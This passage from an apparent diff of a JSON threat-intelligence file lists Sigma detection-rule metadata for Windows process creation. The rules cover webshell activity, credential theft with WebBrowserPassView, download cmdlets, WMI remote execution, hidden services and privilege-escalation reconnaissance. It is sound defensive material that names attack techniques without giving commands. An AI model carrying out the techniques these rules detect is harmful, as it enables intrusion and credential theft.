"https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ], + "creation_date": "2022/09/09", + "filename": "proc_creation_win_user_discovery_get_aduser.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", + "uuid": "d937b75f-a665-4480-88a5-2f20e9f9b22a", + "value": "Possible Privilege Escalation via Weak Service Permissions", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://pentestlab.blog/2017/03/30/weak-service-permissions/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ], + "creation_date": "2019/10/26", + "filename": "proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml", + "author": "Teymur Kheirkhabarov", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", + "uuid": "a537cfc3-4297-4789-92b5-345bfd845ad0", + "value": "Abuse of Service Permissions to Hide Services in 
Tools", + "meta": { + "refs": [ + "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_hide_sevices.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ], + "creation_date": "2021/12/20", + "filename": "proc_creation_win_using_sc_to_hide_sevices.yml", + "author": "Andreas Hunkeler (@Karneades)", + "level": "high", + "falsepositive": [ + "Rare intended use of hidden services" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", + "uuid": "514e4c3a-c77d-4cde-a00f-046425e2301e", + "value": "Abuse of Service Permissions to Hide Services Via Set-Service", + "meta": { + "refs": [ + "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_set_service_to_hide_services.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ], + "creation_date": "2022/10/17", + "filename": "proc_creation_win_using_set_service_to_hide_services.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Rare intended use of hidden services" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when verclsid.exe is used to run COM object via GUID", + "uuid": "d06be4b9-8045-428b-a567-740a26d9db25", + "value": "Verclsid.exe Runs COM Object", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", + "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5", + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2020/10/09", + "filename": "proc_creation_win_verclsid_runs_com.yml", + "author": "Victor Sergeev, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence 
setup", + "uuid": "5687f942-867b-4578-ade7-1e341c46e99a", + "value": "VMToolsd Suspicious Child Process", + "meta": { + "refs": [ + "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmtoolsd_susp_child_process.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1059" + ], + "creation_date": "2021/10/08", + "filename": "proc_creation_win_vmtoolsd_susp_child_process.yml", + "author": "behops, Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Legitimate use by administrator" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", + "uuid": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", + "value": "Java Running with Remote Debugging", + "meta": { + "refs": [ + "https://dzone.com/articles/remote-debugging-java-applications-with-jdwp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vul_java_remote_debugging.yml" + ], + "tags": [ + "attack.t1203", + "attack.execution" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_vul_java_remote_debugging.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", + "uuid": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "value": "Use of W32tm as Timer", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md", + "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_w32tm.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1124" + ], + "creation_date": "2022/09/25", + "filename": "proc_creation_win_w32tm.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", + "uuid": "395907ee-96e5-4666-af2e-2ca91688e151", + "value": "Wab Execution From Non Default Location", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ], + "creation_date": "2022/08/12", + "filename": "proc_creation_win_wab_execution_from_non_default_location.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "uuid": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "value": "Wab/Wabmig Unusual Parent Or Child Processes", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", + 
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ], + "creation_date": "2022/08/12", + "filename": "proc_creation_win_wab_unusual_parents.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline", + "uuid": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", + "value": "Weak or Abused Passwords In CLI", + "meta": { + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ], + "creation_date": "2022/09/14", + "filename": "proc_creation_win_weak_or_abused_passwords.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate usage of the passwords by users via commandline (should be discouraged)", + "Other currently unknown false positives" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of WebBrowserPassView.exe", + "uuid": 
"d0dae994-26c6-4d2d-83b5-b3c8b79ae513", + "value": "Launch WebBrowserPassView Executable", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webbrowserpassview.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.003" + ], + "creation_date": "2022/08/20", + "filename": "proc_creation_win_webbrowserpassview.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "uuid": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", + "value": "Chopper Webshell Process Pattern", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_chopper.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" + ], + "creation_date": "2022/10/01", + "filename": "proc_creation_win_webshell_chopper.yml", + "author": "Florian Roth (rule), MSTI (query)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "uuid": "bed2a484-9348-4143-8a8a-b801c979301c", + "value": "Webshell Detection With Command Line Keywords", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html", + 
"https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_detection.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1505.003",
+ "attack.t1018",
+ "attack.t1033",
+ "attack.t1087"
+ ],
+ "creation_date": "2017/01/01",
+ "filename": "proc_creation_win_webshell_detection.yml",
+ "author": "Florian Roth, Jonhnathan Ribeiro, Anton Kutepov, oscd.community",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system",
+ "uuid": "4ebc877f-4612-45cb-b3a5-8e3834db36c9",
+ "value": "Webshell Hacking Activity Patterns",
+ "meta": {
+ "refs": [
+ "https://youtu.be/7aemGhaE9ds?t=641",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_hacking.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1505.003",
+ "attack.t1018",
+ "attack.t1033",
+ "attack.t1087"
+ ],
+ "creation_date": "2022/03/17",
+ "filename": "proc_creation_win_webshell_hacking.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands",
+ "uuid": "f64e5c19-879c-4bae-b471-6d84c8339677",
+ "value": "Webshell Recon Detection Via CommandLine & Processes",
+ "meta": {
+ "refs": [
+ "https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_recon_detection.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1505.003"
+ ],
+ "creation_date": "2020/07/22",
+ "filename": "proc_creation_win_webshell_recon_detection.yml",
+ "author": "Cian Heasley, Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack",
+ "uuid": "8202070f-edeb-4d31-a010-a26c72ac5600",
+ "value": "Shells Spawned by Web Servers",
+ "meta": {
+ "refs": [
+ "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_spawn.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1505.003",
+ "attack.t1190"
+ ],
+ "creation_date": "2019/01/16",
+ "filename": "proc_creation_win_webshell_spawn.yml",
+ "author": "Thomas Patzke, Florian Roth, Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (update)",
+ "level": "high",
+ "falsepositive": [
+ "Particular web applications may spawn a shell process legitimately"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases)",
+ "uuid": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d",
+ "value": "Usage Of Web Request Commands And Cmdlets",
+ "meta": {
+ "refs": [
+ "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/",
+ "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_web_request_cmd_and_cmdlets.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001"
+ ],
+ "creation_date": "2019/10/24",
+ "filename": "proc_creation_win_web_request_cmd_and_cmdlets.yml",
+ "author": "James Pemberton / @4A616D6573",
+ "level": "medium",
+ "falsepositive": [
+ "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer."
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects usage of the wevtutil utility to perform reconnaissance",
+ "uuid": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf",
+ "value": "Wevtutil Recon",
+ "meta": {
+ "refs": [
+ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml"
+ ],
+ "tags": [
+ "attack.discovery"
+ ],
+ "creation_date": "2022/09/09",
+ "filename": "proc_creation_win_wevtutil_recon.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "medium",
+ "falsepositive": [
+ "Legitmate usage of the utility by administrators to query the event log"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects a whoami.exe executed by privileged accounts that are often misused by threat actors",
+ "uuid": "79ce34ca-af29-4d0e-b832-fc1b377020db",
+ "value": "Run Whoami as Privileged User",
+ "meta": {
+ "refs": [
+ "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
+ "https://nsudo.m2team.org/en-us/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_as_priv_user.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.discovery",
+ "attack.t1033"
+ ],
+ "creation_date": "2022/01/28",
+ "filename": 
"proc_creation_win_whoami_as_priv_user.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation.",
+ "uuid": "80167ada-7a12-41ed-b8e9-aa47195c66a1",
+ "value": "Run Whoami as SYSTEM",
+ "meta": {
+ "refs": [
+ "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_as_system.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.discovery",
+ "attack.t1033"
+ ],
+ "creation_date": "2019/10/23",
+ "filename": "proc_creation_win_whoami_as_system.yml",
+ "author": "Teymur Kheirkhabarov, Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Possible name overlap with NT AUHTORITY substring to cover all languages"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privieleges. 
This is often used after a privilege escalation attempt.",
+ "uuid": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b",
+ "value": "Run Whoami Showing Privileges",
+ "meta": {
+ "refs": [
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_priv.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.discovery",
+ "attack.t1033"
+ ],
+ "creation_date": "2021/05/05",
+ "filename": "proc_creation_win_whoami_priv.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Administrative activity (rare lookups on current privileges)"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects Task Scheduler .job import arbitrary DACL write\\par",
+ "uuid": "931b6802-d6a6-4267-9ffa-526f57f22aaf",
+ "value": "Windows 10 Scheduled Task SandboxEscaper 0-day",
+ "meta": {
+ "refs": [
+ "https://github.com/SandboxEscaper/polarbearrepo/tree/master/bearlpe",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_win10_sched_task_0day.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.t1053.005",
+ "car.2013-08-001"
+ ],
+ "creation_date": "2019/05/22",
+ "filename": "proc_creation_win_win10_sched_task_0day.yml",
+ "author": "Olaf Hartong",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)",
+ "uuid": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48",
+ "value": "Suspicious WindowsTerminal Child Processes",
+ "meta": {
+ "refs": [
+ "https://persistence-info.github.io/Data/windowsterminalprofile.html",
+ 
"https://twitter.com/nas_bench/status/1550836225652686848",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.persistence"
+ ],
+ "creation_date": "2022/07/25",
+ "filename": "proc_creation_win_windows_terminal_susp_children.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "medium",
+ "falsepositive": [
+ "Other legitimate \"Windows Terminal\" profiles"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz",
+ "uuid": "98b53e78-ebaf-46f8-be06-421aafd176d9",
+ "value": "Detect Execution of winPEAS",
+ "meta": {
+ "refs": [
+ "https://github.com/carlospolop/PEASS-ng",
+ "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.t1082",
+ "attack.t1087",
+ "attack.t1046"
+ ],
+ "creation_date": "2022/09/19",
+ "filename": "proc_creation_win_winpeas_tool.yml",
+ "author": "Georg Lauenstein",
+ "level": "high",
+ "falsepositive": [
+ "Other programs that use the same command line flags"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the Installation of a Exchange Transport Agent",
+ "uuid": "83809e84-4475-4b69-bc3e-4aad8568612f",
+ "value": "MSExchange Transport Agent Installation",
+ "meta": {
+ "refs": [
+ "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_win_exchange_transportagent.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1505.002"
+ ],
+ 
"creation_date": "2021/06/08",
+ "filename": "proc_creation_win_win_exchange_transportagent.yml",
+ "author": "Tobias Michalski",
+ "level": "medium",
+ "falsepositive": [
+ "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this."
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model...etc.",
+ "uuid": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f",
+ "value": "Suspicious Get ComputerSystem Information with WMIC",
+ "meta": {
+ "refs": [
+ "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.execution",
+ "attack.t1047"
+ ],
+ "creation_date": "2022/09/08",
+ "filename": "proc_creation_win_wmic_computersystem_recon.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n",
+ "uuid": "164eda96-11b2-430b-85ff-6a265c15bf32",
+ "value": "Suspicious Get Local Groups Information with WMIC",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_group_recon.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1069.001"
+ ],
+ "creation_date": "2021/12/12",
+ "filename": "proc_creation_win_wmic_group_recon.yml",
+ "author": "frack113",
+ "level": "low",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects wmic known recon method to look for installed hotfixes, often used by pentest and attackers enum scripts",
+ "uuid": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45",
+ "value": "WMIC Hotfix Recon",
+ "meta": {
+ "refs": [
+ "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat",
+ "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_hotfix_enum.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1047"
+ ],
+ "creation_date": "2022/06/20",
+ "filename": "proc_creation_win_wmic_hotfix_enum.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "An adversary might use WMI to list Processes running on the compromised host or list installed Software hotfix and patches.",
+ "uuid": "221b251a-357a-49a9-920a-271802777cc0",
+ "value": "Suspicious WMI Reconnaissance",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_reconnaissance.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ 
"attack.t1047"
+ ],
+ "creation_date": "2022/01/01",
+ "filename": "proc_creation_win_wmic_reconnaissance.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "An adversary might use WMI to execute commands on a remote system",
+ "uuid": "e42af9df-d90b-4306-b7fb-05c863847ebd",
+ "value": "WMI Remote Command Execution",
+ "meta": {
+ "refs": [
+ "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_command.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1047"
+ ],
+ "creation_date": "2022/03/13",
+ "filename": "proc_creation_win_wmic_remote_command.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "An adversary might use WMI to check if a certain Remote Service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n",
+ "uuid": "09af397b-c5eb-4811-b2bb-08b3de464ebf",
+ "value": "WMI Reconnaissance List Remote Services",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_service.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1047"
+ ],
+ "creation_date": "2022/01/01",
+ "filename": "proc_creation_win_wmic_remote_service.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Uninstall an application with wmic",
+ "uuid": "b53317a0-8acf-4fd1-8de8-a5401e776b96",
+ "value": "WMI Uninstall An Application",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-10---application-uninstall-using-wmic",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remove_application.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1047"
+ ],
+ "creation_date": "2022/01/28",
+ "filename": "proc_creation_win_wmic_remove_application.yml",
+ "author": "frac113",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects usage of wmic to start or stop a service",
+ "uuid": "0b7163dc-7eee-4960-af17-c0cd517f92da",
+ "value": "WMIC Service Start/Stop",
+ "meta": {
+ "refs": [
+ "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_service.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1047"
+ ],
+ "creation_date": "2022/06/20",
+ "filename": "proc_creation_win_wmic_service.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects wmic 
known recon method to look for unquoted service paths, often used by pentest and attackers enum scripts",
